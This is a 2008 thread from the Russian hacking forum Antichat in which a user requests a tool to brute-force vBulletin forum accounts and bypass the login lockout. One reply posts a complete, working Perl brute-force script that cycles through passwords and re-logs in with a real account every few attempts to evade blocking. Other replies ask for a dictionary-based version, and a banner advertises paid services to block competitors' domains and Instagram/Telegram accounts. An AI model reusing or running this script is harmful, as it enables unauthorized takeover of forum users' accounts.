Форум АНТИЧАТ - Брут на vBulletin...

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Брут на vBulletin...

Опции темы

Поиск в этой теме

Опции просмотра

Брут на vBulletin...

25.06.2008, 01:21

c0rp$e

Постоянный

Регистрация: 05.12.2003

Сообщений: 340

Провел на форуме:
3548105

Репутация: 98

Брут на vBulletin...

Нужен брутер на форумы типа vBulletin.

Желательно так же, чтоб он мог собирать всех пользователей форума.
Брутил как и по всему списку акков, с 1 паролем
так и к одному акку со словарем пассов.

Блочат после 5 попыток неверного ввода, куки + ip.
На никнэйм после 5 попыток вроде как блок не идет.

ну и если нет такого, ищу того кто написать сможет. ( иль дописать из того, что в паблик выкладывали)
Спасибо.

Последний раз редактировалось c0rp$e; 25.06.2008 в 01:24..

25.06.2008, 01:25

~~baltazar~~

Banned

Регистрация: 30.03.2007

Сообщений: 344

Провел на форуме:
5149122

Репутация: 2438

Отправить сообщение для baltazar с помощью ICQ

Код:

#!/usr/bin/perl

use IO::Socket;
use LWP::UserAgent;
use HTTP::Cookies;
use Time::HiRes qw(gettimeofday);

$host = $ARGV[0];
$usern = $ARGV[1];
$passw = $ARGV[2];
$uname = $ARGV[3];
$url = "http://".$host;
$alpha = "abcdefghijklmnopqrstuvwxyz"; #charset
$charcount = 24; #number of chars in $alpha
$dbgtmr = "1"; #Intervall of showing the current speed + lastpassword in seconds.
$count = 0;
$logins = 0;
$minchars = 1; #min chars
$maxchars = 10; #max chars

print q(
###########################################################
#                vBulletin brute forcer                   #
#              http://www.unnamedone.com                  #
#               brian_denys@hotmail.com                   #
#                  09 - April - 2008                      #
################## Coded By UnnamedOne ####################
);

if (@ARGV < 4)
{
   print " #  I am not responsible for anything that you do with this!\n";
   print " #  This has been tested on vBulletin 3.6.8 and 3.7.0!\n";
   print " #  usage : vbrute.pl [host & path] [user] [pass] [target]\n";
   print " #  E.g : vbrute.pl www.milw0rm.com/vBulletin3.6.8/ UnnamedOne MyPass str0ke\n";
   exit();
}

fakelogin();
for(my $t=$minchars;$t<=$maxchars;$t++)
{
   crack($t);
}

sub fakelogin {
   $xplr = LWP::UserAgent->new() or die;
   $cookie_jarr = HTTP::Cookies->new();
   $xplr->cookie_jar( $cookie_jarr );
   $resr = $xplr->post($url.'login.php?do=login',
   Content => [
   "vb_login_username"   => "$usern",
   "vb_login_password"   => "$passw",
   "do"      => "login",
   ],);
   if($cookie_jarr->as_string =~ /IDstack=(.*?);/) {
      #Do nothing..
   }
   else
   {
      #print $cookie_jarr->as_string;
      print "Forum not vulnerable or wrong username / password.\n";
      exit();
   }
}

sub crack {
   $xpl = LWP::UserAgent->new() or die;
   $cookie_jar = HTTP::Cookies->new();
   $CharSet = shift;
   @RawString = ();
   for (my $i =0;$i<$CharSet;$i++) {
      $RawString[i] = 0;
   }
   $Start = gettimeofday();
   do {
      for (my $i =0;$i<$CharSet;$i++)
      {
         if ($RawString[$i] > length($alpha)-1) {
            if ($i==$CharSet-1) {
               $cnt = 0;
               return false;
            }
            $RawString[$i+1]++;
            $RawString[$i]=0;
         }
      }
      $ret = "";
      for (my $i =0;$i<$CharSet;$i++) {
         $ret = $ret . substr($alpha,$RawString[$i],1);
      }
      $count++;
      if($count == 4) {
         fakelogin();
         $count = 0;
      }
      $xpl->cookie_jar( $cookie_jar );
      $res = $xpl->post($url.'login.php?do=login',
      Content => [
      "vb_login_username"   => "$uname",
      "vb_login_password"   => "$ret",
      "do"      => "login",
      ],);
      $cnt++;
      $Stop = gettimeofday();
      if ($Stop-$Start>$dbgtmr) {
         $cnt = int($cnt/$dbgtmr);
         $Start = gettimeofday();
      }
      $logins++;
      system("clear");
      $pro = ($logins / ($charcount * $maxchars));
      print "Current password: $ret\n";
      print "Login attempts: $logins\n";
      print "Cracking speed: $cnt passwords/sec\n";
      print "$pro% finished.\n";
      $cnt = 0;
      if($cookie_jar->as_string =~ /IDstack=(.*?);/) {
         print "Password cracked! => $ret\n";
         exit();

      }
      $RawString[0]++;
   }while($RawString[$CharSet-1]<length($alpha));
}

25.06.2008, 01:33

~~De-visible~~

Banned

Регистрация: 06.01.2008

Сообщений: 904

Провел на форуме:
4037638

Репутация: 1821

Отправить сообщение для De-visible с помощью ICQ

Цитата:

Сообщение от c0rp$e

Цитата:

ищу того кто написать сможет.

В аську можешь стукануть, но ничего не обещаю...зависит все от тебя)

27.06.2008, 00:18

Vallez

Участник форума

Регистрация: 25.12.2005

Сообщений: 151

Провел на форуме:
874713

Репутация: 53

baltazar а есть брут по словарям или может можно этот переписать?

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
vBulletin Mania by CWGURU	mff	ПО для Web разработчика	1	18.08.2008 09:43
vBulletin Skins AIO v2 by Team Hybrid	mff	ПО для Web разработчика	0	19.06.2008 12:47
Html_Injection in vBulletin 3.5.2	max_pain89	Форумы	16	08.01.2006 17:23
vBulletin Version 3.0.7	Enter.beta	Форумы	9	11.11.2005 01:57
БРУТ	PUMA	E-Mail	8	21.09.2004 16:06

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход